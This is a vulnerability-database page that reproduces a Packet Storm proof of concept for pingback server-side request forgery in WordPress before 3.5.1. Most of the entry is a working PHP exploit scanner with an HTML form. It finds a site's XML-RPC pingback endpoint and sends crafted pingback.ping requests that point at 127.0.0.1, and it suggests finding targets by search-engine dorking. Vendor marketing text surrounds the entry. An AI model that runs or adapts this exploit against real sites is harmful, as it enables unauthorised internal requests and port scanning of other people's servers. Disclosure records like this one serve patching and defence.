Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Pingback Checker Server-Side Request Forgery

🗓️ 06 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 201 Views

WordPress versions before 3.5.1 are vulnerable to Server-Side Request Forgery via pingback.

Code
=============================================================================================================================================
    | # Title     : WordPress before 3.5.1 Pingback Checker Tool                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The XMLRPC API in WordPress before 3.5.1 allows remote attackers to send HTTP requests to intranet servers, and conduct port-scanning attacks, by specifying a crafted source URL for a pingback, related to a Server-Side Request Forgery (SSRF) issue.
       
    [+] save code as poc.php.
    
    [+] USage : http://127.0.0.1/poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class WordpressPingbackLocator {
        private $targetUri;
        private $numRedirects;
        private $dbActive;
    
        public function __construct($targetUri = '/', $numRedirects = 10) {
            $this->targetUri = rtrim($targetUri, '/') . '/';
            $this->numRedirects = $numRedirects;
            $this->dbActive = $this->checkDatabase();
        }
    
        private function checkDatabase() {
            // تحقق مما إذا كان هناك اتصال بقاعدة البيانات
            return function_exists('mysqli_connect');
        }
    
        public function getXmlRpcUrl($ip) {
            echo "$ip - Enumerating XML-RPC URI...\n";
            
            $headers = get_headers("http://$ip{$this->targetUri}", 1);
            if (isset($headers['X-Pingback'])) {
                return $headers['X-Pingback'];
            }
            echo "$ip - X-Pingback header not found\n";
            return null;
        }
    
        public function generatePingbackXml($target, $validBlogPost) {
            return "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>" .
                   "<methodCall><methodName>pingback.ping</methodName>" .
                   "<params><param><value><string>$target</string></value></param>" .
                   "<param><value><string>$validBlogPost</string></value></param>" .
                   "</params></methodCall>";
        }
    
        public function getBlogPosts($xmlRpc, $ip) {
            $blogPosts = $this->getAllBlogPosts();
            foreach ($blogPosts as $blogPost) {
                $response = $this->sendPingbackRequest($xmlRpc, 'http://127.0.0.1', $blogPost);
                if ($response && strpos($response, '<value><int>33</int></value>') === false) {
                    echo "$ip - Pingback enabled: $blogPost\n";
                    return $blogPost;
                }
            }
            return null;
        }
    
        private function sendPingbackRequest($xmlRpc, $target, $blogPost) {
            $pingbackXml = $this->generatePingbackXml($target, $blogPost);
            $ch = curl_init($xmlRpc);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $pingbackXml);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function getAllBlogPosts() {
            return ["http://example.com/post1", "http://example.com/post2"];
        }
    
        public function runHost($ip) {
            echo "$ip - Checking if it's a WordPress site...\n";
            $xmlrpc = $this->getXmlRpcUrl($ip);
            if (!$xmlrpc) {
                echo "$ip - Not vulnerable or not a WordPress site\n";
                return;
            }
    
            $blogPost = $this->getBlogPosts($xmlrpc, $ip);
            if ($blogPost && $this->dbActive) {
                $this->storeVuln($ip, $blogPost);
            } else {
                echo "$ip - X-Pingback enabled but no vulnerable blogs found\n";
            }
        }
    
        private function storeVuln($ip, $blog) {
            echo "Stored vulnerability: $ip - Pingback found at $blog\n";
        }
    }
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $target = $_POST['target'] ?? '';
        if (!empty($target)) {
            $scanner = new WordpressPingbackLocator('/wordpress/');
            $scanner->runHost($target);
        }
    }
    ?>
    
    <!DOCTYPE html>
    <html lang="ar">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>فحص WordPress Pingback</title>
    </head>
    <body>
        <h2>أداة فحص WordPress Pingback</h2>
        <form method="POST">
            <label for="target">أدخل عنوان الموقع:</label>
            <input type="text" id="target" name="target" required>
            <button type="submit">فحص</button>
        </form>
    </body>
    </html>
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Mar 2025 00:00Current
7.2High risk
Vulners AI Score7.2
wordpress vulnerabilityserver-side request forgeryxmlrpc apipingback exploitsecurity risk.
201